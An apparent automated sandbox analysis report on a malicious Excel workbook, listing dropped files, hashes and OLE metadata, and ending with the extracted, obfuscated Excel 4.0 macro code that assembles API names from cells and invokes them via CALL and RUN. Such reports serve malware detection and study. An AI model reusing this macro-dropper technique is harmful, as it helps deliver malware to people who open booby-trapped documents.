                  SSDEEP:24:hBntmDvKUQQDvKUr7C5fpqp8gPvXHmXvponXux:3ntmD5QQD5XC5RqHHXmXvp++x
                  MD5:D4AE187B4574036C2D76B6DF8A8C1A30
                  SHA1:B06F409FA14BAB33CBAF4A37811B8740B624D9E5
                  SHA-256:A2CE3A0FA7D2A833D1801E01EC48E35B70D84F3467CC9F8FAB370386E13879C7
                  SHA-512:1F44A360E8BB8ADA22BC5BFE001F1BABB4E72005A46BC2A94C33C4BD149FF256CCE6F35D65CA4F7FC2A5B9E15494155449830D2809C8CF218D0B9196EC646B0C
                  Malicious:false
                  Reputation:high, very likely benign file
                  Preview: 0..y..*.H.........j0..f...1.0...*.H.........N0..J0..2.......D....'..09...@k0...*.H........0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30...000930211219Z..210930140115Z0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30.."0...*.H.............0..........P..W..be......,k0.[...}.@......3vI*.?!I..N..>H.e...!.e.*.2....w..{........s.z..2..~..0....*8.y.1.P..e.Qc...a.Ka..Rk...K.(.H......>.... .[.*....p....%.tr.{j.4.0...h.{T....Z...=d.....Ap..r.&.8U9C....\@........%.......:..n.>..\..<.i....*.)W..=....]......B0@0...U.......0....0...U...........0...U.........{,q...K.u...`...0...*.H...............,...\...(f7:...?K.... ]..YD.>.>..K.t.....t..~.....K. D....}..j.....N..:.pI...........:^H...X._..Z.....Y..n......f3.Y[...sG.+..7H..VK....r2...D.SrmC.&H.Rg.X..gvqx...V..9$1....Z0G..P.......dc`........}...=2.e..|.Wv..(9..e...w.j..w.......)...55.1.
                  C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:data
                  Category:dropped
                  Size (bytes):326
                  Entropy (8bit):3.1370231030617903
                  Encrypted:false
                  SSDEEP:6:kKIlpkQSN+SkQlPlEGYRMY9z+4KlDA3RUeSKyzkOt:QlphZkPlE99SNxAhUeSKO
                  MD5:91D6CEB9ECFC565AC3A9D9BA29CACB09
                  SHA1:D74098078045A1A2FC1DBAA124152D24C68842BC
                  SHA-256:2FBD41C1E149E984DBC5A2D4BA7EB52255438E47E4E26613BFCC27FBC70997C5
                  SHA-512:651F8F361659B6E3162141C58FB0993625AE109973483D5A11556520E9051C2378B181BE1F0BE58B5EF46CA93B42B3FBCA0C3ACECEA49E45ED7FF4F4E4A10E4A
                  Malicious:false
                  Reputation:low
                  Preview: p...... .........(V#fG..(....................................................... ...........Y5......$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".8.0.f.8.8.3.5.9.3.5.d.7.1.:.0."...
                  C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E0F5C59F9FA661F6F4C50B87FEF3A15A
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:data
                  Category:dropped
                  Size (bytes):252
                  Entropy (8bit):2.9794067658004937
                  Encrypted:false
                  SSDEEP:3:kkFklli3lfllXlE/jQEBllPlzRkwWBARLNDU+ZMlKlBkvclcMlVHblB1Ffl5nPWP:kK3yQE1liBAIdQZV7ulPPN
                  MD5:F950FF6E59197AE70EF701881F33FAC5
                  SHA1:023F49F3357A5EFBD2958C72F982199186B484E7
                  SHA-256:2E1A9FE04A2582FDEB03ACCF404E2DA01A81293C565D6799BD52E9D92C7FE557
                  SHA-512:CB0D29624CDECD9DC24E1A7CC4AE3C545D89A9A1AECC9762B034AF6A0EC6948504AE7B68C6218E219075D297E17C9C7B7303527B89406BDEAEF1F1D90972B34F
                  Malicious:false
                  Reputation:low
                  Preview: p...... ....`...(E.#fG..(....................................................... .........|.j-......(...........}...h.t.t.p.:././.a.p.p.s...i.d.e.n.t.r.u.s.t...c.o.m./.r.o.o.t.s./.d.s.t.r.o.o.t.c.a.x.3...p.7.c...".3.7.d.-.5.b.f.8.d.f.8.0.6.2.7.0.0."...
                  C:\Users\user\AppData\Local\Temp\99DE0000
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:data
                  Category:dropped
                  Size (bytes):81246
                  Entropy (8bit):7.90651207151528
                  Encrypted:false
                  SSDEEP:1536:TeKmfTW8SDcn9iZtJOXAQR2KtCbuMB/yDL4D5Kzhl4AiCb/qaz:TALW8SD8YZo/Uh0GUzEi9
                  MD5:876093860AC6D350BBB4C217AA7CC562
                  SHA1:2F8463551DD2885532FC39DFB47B141BCBA7D35A
                  SHA-256:77B176B0BC29634B49907A9C334A7DDF32A97D8941D626460C8AE3DD2A5DDE8B
                  SHA-512:966BC0F073C448AE56410FEFE42B0463BAC4F2ACEC31EC410865B033619EBE82143578FE976EC77A650F1CB49A11C889963485BBDF859A58CEC14A98B496A18C
                  Malicious:false
                  Reputation:low
                  Preview: .U.n.0....?..........C....I?.&..an.0........%..h!..y...5..D.......J..e....o..$...;h....,>..?m.`Eh.-.S..9G......fV>Z..5v<........+..%p.N..-.?a%.M.n74.s..U?v.e......".Q...H.W+-Ay.l....A(...5M....#.D.!.'5..4....iD..G......B.R....PX.(..s..~..F..z.1..Ki..>.....$9L.5l$..$.X!..ubi..vo..(.$.r..!..&9.~..B<...j.P._.T....^&C.... .Q..J.../......ik.GD7e..H..{.A=&j.....{....5[....s.......}@j.......2..D.1i8..S..H.q..Qg.|H(P'.y9..........PK..........!..!.9............[Content_Types].xml ...(.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  C:\Users\user\AppData\Local\Temp\CabE3CB.tmp
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:Microsoft Cabinet archive data, 59863 bytes, 1 file
                  Category:dropped
                  Size (bytes):59863
                  Entropy (8bit):7.99556910241083
                  Encrypted:true
                  SSDEEP:1536:Gs6cdy9E/ABKQPOrdweEz480zdPMHXNY/gLHfIZN:GNOqOrdDdJPAX1LHA/
                  MD5:15775D95513782F99CDFB17E65DFCEB1
                  SHA1:6C11F8BEE799B093F9FF4841E31041B081B23388
                  SHA-256:477A9559194EDF48848FCE59E05105168745A46BDC0871EA742A2588CA9FBE00
                  SHA-512:AC09CE01122D7A837BD70277BADD58FF71D8C5335F8FC599D5E3ED42C8FEE2108DD043BCE562C82BA12A81B9B08BD24B961C0961BF8FD3A0B8341C87483CD1E7
                  Malicious:false
                  Reputation:moderate, very likely benign file
                  Preview: MSCF............,...................I........b.........R.i .authroot.stl.qqp.4..CK..8T....c_.d....A.F....m"...AH)-.%.QIR..$t)Kd.-QQ*..~.L.2.L........sx.}...~....$....yy.A.8;....|.%OV.a0xN....9..C..t.z.,X...,..1Qj,.p.E.y..ac`.<.e.c.aZW..B.jy....^]..+)..!...r.X:.O.. ..Y..j.^.8C........n7R....p!|_.+..<...A.Wt.=. .sV..`.9O...CD./.s.\#.t#..s..Jeiu..B$.....8..(g..tJ....=,...r.d.].xqX4.......g.lF...Mn.y".W.R....K\..P.n._..7...........@pm.. Q....(#.....=.)...1..kC.`......AP8.A..<....7S.L....S...^.R.).hqS...DK.6.j....u_.0.(4g.....!,.L`......h:.a]?......J9.\..Ww........%........4E.......q.QA.0.M<.&.^*aD.....,..]*....5.....\../ d.F>.V........_.J....."....wI..'..z...j..Ds....Z...[..........N<.d.?<....b..,...n......;....YK.X..0..Z.....?...9.3.+9T.%.l...5.YK.E.V...aD.0...Y../e.7...c..g....A..=.....+..u2..X.~....O....\=...&...U.e...?...z....$.)S..T...r.!?M..;.....r,QH.B <.(t..8s3..u[.N8gL.%...v....f...W.y...cz-.EQ.....c...o..n........D*..........2.
                  C:\Users\user\AppData\Local\Temp\TarE3CC.tmp
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:data
                  Category:dropped
                  Size (bytes):156386
                  Entropy (8bit):6.3086528024913715
                  Encrypted:false
                  SSDEEP:1536:ZlI6c79JjgCyrYBWsWimp4Ydm6Caku2SWsz0OD8reJgMnl3XlMyGr:ZBUJcCyZfdmoku2SL3kMnBGyA
                  MD5:78CABD9F1AFFF17BB91A105CF4702188
                  SHA1:52FA8144D1FC5F92DEB45E53F076BCC69F5D8CC7
                  SHA-256:C7B6743B228E40B19443E471081A51041974801D325DB4ED8FD73A1A24CBD066
                  SHA-512:F0BF5DFBAB47CC6A3D1BF03CEC3FDDA84537DB756DA97E6D93CF08A5C750EABDFBF7FCF7EBDFFF04326617E43F0D767E5A2B7B68C548C6D9C48F36493881F62B
                  Malicious:false
                  Reputation:moderate, very likely benign file
                  Preview: 0..b...*.H.........b.0..b....1.0...`.H.e......0..R...+.....7.....R.0..R.0...+.....7........5XY._...210419201239Z0...+......0..R.0..*.....`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o
                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\46747509_by_Libranalysis.LNK
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed May 12 18:36:28 2021, mtime=Wed May 12 18:36:41 2021, atime=Wed May 12 18:36:41 2021, length=174080, window=hide
                  Category:dropped
                  Size (bytes):2168
                  Entropy (8bit):4.568028958310555
                  Encrypted:false
                  SSDEEP:48:8h/XT0jEpEFOE+INQFOE6aQh2h/XT0jEpEFOE+INQFOE6aQ/:8h/XojEpMFRNwF6aQh2h/XojEpMFRNwG
                  MD5:7A63E154E9FF49CB80E67E2EBD5F0D5B
                  SHA1:247F22363419B63C6B87472515D4C28C880DAEDD
                  SHA-256:2B9144E0076F5BFB32EFF108D3577C7D4872AAD968CF6051F02CE232CE769501
                  SHA-512:8E72650FFD6ABF97A7AA39E8074DC978304DA1BF005C3B281F4ECCD5268D4770456A22841B244B4439558D187DBC9B668AF9C4B5F5F6D12B3DEF1149009174DB
                  Malicious:false
                  Preview: L..................F.... .....!.fG..e..!fG..H.."fG...............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......R....Desktop.d......QK.X.R..*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2......R.. .467475~1.XLS..f......R...R..*...9.....................4.6.7.4.7.5.0.9._.b.y._.L.i.b.r.a.n.a.l.y.s.i.s...x.l.s.......................-...8...[............?J......C:\Users\..#...................\\830021\Users.user\Desktop\46747509_by_Libranalysis.xls.3.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.4.6.7.4.7.5.0.9._.b.y._.L.i.b.r.a.n.a.l.y.s.i.s...x.l.s.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......
                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Wed May 12 18:36:41 2021, atime=Wed May 12 18:36:41 2021, length=8192, window=hide
                  Category:dropped
                  Size (bytes):867
                  Entropy (8bit):4.48064693934446
                  Encrypted:false
                  SSDEEP:12:85QjLgXg/XAlCPCHaXtB8XzB/ZEX+Wnicvb3bDtZ3YilMMEpxRljKg1yTdJP9TdU:85M/XTd6jUYefDv3qXqrNru/
                  MD5:6AB095E0158DC2C6245993584E63A48C
                  SHA1:6CB4F915FF98D2B71401445BE0732F49AA31EAE2
                  SHA-256:8387C1D20D6C87239B4970874E24BE756AD04CA5A84AF58924B92D080A2C966D
                  SHA-512:A77FD7E92544B5D6CDE9182E7A0FBA057BBF783107B857315A7D696AA374DBBA6193CFA6EE93B0DD23516FF011B03A23F27C68D2A388722A273207FE6325E5FF
                  Malicious:false
                  Preview: L..................F...........7G..e..!fG..e..!fG... ......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......R....Desktop.d......QK.X.R..*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\830021\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......830021..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):125
                  Entropy (8bit):4.719349509094217
                  Encrypted:false
                  SSDEEP:3:oyBVomMJTSRysoUwSLMp6lQYsoUwSLMp6lmMJTSRysoUwSLMp6lv:dj6JLuNAYuNbJLuNf
                  MD5:7A74032CFDC286A8B22B5FA330A94912
                  SHA1:12898525F123F47CF7FAB104EB017C60E0117FC9
                  SHA-256:3F1987D281034C9CD601F86F8B6F6D4DB6F0CCE0538C32471A710F608E114EC0
                  SHA-512:E35D4C2B7D71FB8C5752F01A24DA1719FD442C97831126092A3E684BDBA13E6E48DD8402082561EBCFAE2E2F825B341FA66A6984A64B457C54D8924FCB642521
                  Malicious:false
                  Preview: Desktop.LNK=0..[xls]..46747509_by_Libranalysis.LNK=0..46747509_by_Libranalysis.LNK=0..[xls]..46747509_by_Libranalysis.LNK=0..
                  C:\Users\user\Desktop\6ADE0000
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:Applesoft BASIC program data, first line number 16
                  Category:dropped
                  Size (bytes):205059
                  Entropy (8bit):5.644393952298303
                  Encrypted:false
                  SSDEEP:3072:3l8iFxSD8YNoTU90jwoPzn3b4X7vrPlsrXvLtwnLHl8inK:rFxTrTU9CRKnK
                  MD5:C2C8E542E617AD960015EBBC6FB2EA9B
                  SHA1:22280982EF94C32D12F990F582D6FF713A7E06A7
                  SHA-256:4F1C30B2672BD1B33E0654FB13BA7B1175FB9C1A6A8BC1E73AEB7465FC6BDC27
                  SHA-512:6C0DE1A9C041951CE0D447B2C4FD1834F1980FE6A93D55DAEF65C6723CAF3EC9985B86C0E4BFA46AA3A7CF36F5AEEFB0D5943D56FE4CED9FA0A488F9E258E08D
                  Malicious:false
                  Preview: ........g2..........................\.p....user B.....a.........=...............................................=.....i..9J.8.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................A.r.i.a.l.1...................A.r.i.a.l.1...................A.r.i.a.l.1...................C.a.l.i.b.r.i.1...,...8...........A.r.i.a.l.1.......8...........A.r.i.a.l.1.......8...........A.r.i.a.l.1.......<...........A.r.i.a.l.1.......4...........A.r.i.a.l.1.......4...........A.r.i.a.l.1...h...8...........C.a.m.b.r.i.a.1...................C.a.l.i.b.r.i.1...................A.r.i.a.l.1...................A.r.i.a.l.1.......>...........A.r.i.a.l.1.......?...........A.r.i.a.l.1...................A.r.i.a.l.1...................A.r.i.a.l.1...................C.a.l.i.b.r.i.1...................A.r.i.a.l.1...................A.r.i.a.l.1...................A.r.i.a.l.1...............

                  Static File Info

                  General

                  File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Author: van-van, Last Saved By: vi-vi, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed May 12 08:24:11 2021, Security: 0
                  Entropy (8bit):3.258986427712615
                  TrID:
                  • Microsoft Excel sheet (30009/1) 78.94%
                  • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                  File name:46747509_by_Libranalysis.xls
                  File size:375808
                  MD5:46747509aca01f63274d3edfeddb787b
                  SHA1:8bcb09a42a62453b9437915442ce981896cb4de7
                  SHA256:00da3dfab496ea65873d53636db189ed7bd46f502386cb014876a75d71d6869b
                  SHA512:490f689c0b47303a7fc96756347df946a953288dec82250503d5057cb35f1173f59b6125943dec8f9590fd3e31b9528dfeea0b258f1eedaeba52358e27702c7b
                  SSDEEP:3072:Q8UGHv2tt/BI/s/C/i/R/7/3/UQ/OhP/2/a/1/I/T/tbHm7H9G4l+s2k3zN4sbc5:vUGAt6Uqa5DPdG9uS9QLp4l+s+E8
                  File Content Preview:........................>......................................................................................................................................................................................................................................

                  File Icon

                  Icon Hash:e4eea286a4b4bcb4

                  Static OLE Info

                  General

                  Document Type:OLE
                  Number of OLE Files:1

                  OLE File "46747509_by_Libranalysis.xls"

                  Indicators

                  Has Summary Info:True
                  Application Name:Microsoft Excel
                  Encrypted Document:False
                  Contains Word Document Stream:False
                  Contains Workbook/Book Stream:True
                  Contains PowerPoint Document Stream:False
                  Contains Visio Document Stream:False
                  Contains ObjectPool Stream:
                  Flash Objects Count:
                  Contains VBA Macros:True

                  Summary

                  Code Page:1251
                  Author:van-van
                  Last Saved By:vi-vi
                  Create Time:2006-09-16 00:00:00
                  Last Saved Time:2021-05-12 07:24:11
                  Creating Application:Microsoft Excel
                  Security:0

                  Document Summary

                  Document Code Page:1251
                  Thumbnail Scaling Desired:False
                  Contains Dirty Links:False

                  Streams

                  Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                  General
                  Stream Path:\x5DocumentSummaryInformation
                  File Type:data
                  Stream Size:4096
                  Entropy:0.287037498961
                  Base64 Encoded:False
                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . 0 . . . . . . . 8 . . . . . . . @ . . . . . . . H . . . . . . . t . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D o c 1 . . . . . D o c 2 . . . . . D o c 3 . . . . . D o c 4 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . E x c e l 4 . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                  Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 b4 00 00 00 05 00 00 00 01 00 00 00 30 00 00 00 0b 00 00 00 38 00 00 00 10 00 00 00 40 00 00 00 0d 00 00 00 48 00 00 00 0c 00 00 00 74 00 00 00 02 00 00 00 e3 04 00 00 0b 00 00 00 00 00 00 00 0b 00 00 00 00 00 00 00 1e 10 00 00 04 00 00 00
                  Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                  General
                  Stream Path:\x5SummaryInformation
                  File Type:data
                  Stream Size:4096
                  Entropy:0.290777742057
                  Base64 Encoded:False
                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . X . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . v a n - v a n . . . . . . . . . v i - v i . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . | . # . . . @ . . . . . . . . F . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                  Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 a0 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 58 00 00 00 12 00 00 00 68 00 00 00 0c 00 00 00 80 00 00 00 0d 00 00 00 8c 00 00 00 13 00 00 00 98 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 08 00 00 00
                  Stream Path: Book, File Type: Applesoft BASIC program data, first line number 8, Stream Size: 363283
                  General
                  Stream Path:Book
                  File Type:Applesoft BASIC program data, first line number 8
                  Stream Size:363283
                  Entropy:3.24522262131
                  Base64 Encoded:True
                  Data ASCII:. . . . . . . . . 7 . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . v i - v i B . . . . . . . . . . . . . . . . . . . . . . . D o c 3 . . . . . . . . . . . . . . . . . . _ x l f n . A G G R E G A T E . . . . . . . . . . . . . . . . . . . . _ x l f n . F . I N V . R T . . . . ! . . . . .
                  Data Raw:09 08 08 00 00 05 05 00 17 37 cd 07 e1 00 00 00 c1 00 02 00 00 00 bf 00 00 00 c0 00 00 00 e2 00 00 00 5c 00 70 00 05 76 69 2d 76 69 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                  Macro 4.0 Code

                  CALL(Doc3!AU10,Doc3!AU11,Doc3!AU12,0,Doc3!AU13,Doc3!BC17,0,!AL21)=CALL(Doc3!AU10,Doc3!AU11,Doc3!AU12,0,Doc3!AU14,Doc3!BC18&"1",0,!AL21)=RUN(Doc4!AM6)
                  
                  ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=FORMULA(before.3.5.0.sheet!AZ39&BA39&before.3.5.0.sheet!BB39&before.3.5.0.sheet!BC39,before.3.5.0.sheet!AU13)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=FORMULA(before.3.5.0.sheet!AZ40&BA40&before.3.5.0.sheet!BB40&before.3.5.0.sheet!BC40,before.3.5.0.sheet!AU14)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=FORMULA(""U""&before.3.5.0.sheet!BC25&before.3.5.0.sheet!BC29&before.3.5.0.sheet!BF28&before.3.5.0.sheet!BC28&before.3.5.0.sheet!BC31&before.3.5.0.sheet!BF29&""A"",before.3.5.0.she
                  "=CALL(Doc3!AU10,Doc3!AU11,Doc3!AU12,0,Doc3!AU13,Doc3!BC17,0,!AL21)=CALL(Doc3!AU10,Doc3!AU11,Doc3!AU12,0,Doc3!AU14,Doc3!BC18&""1"",0,!AL21)=RUN(Doc4!AM6)"
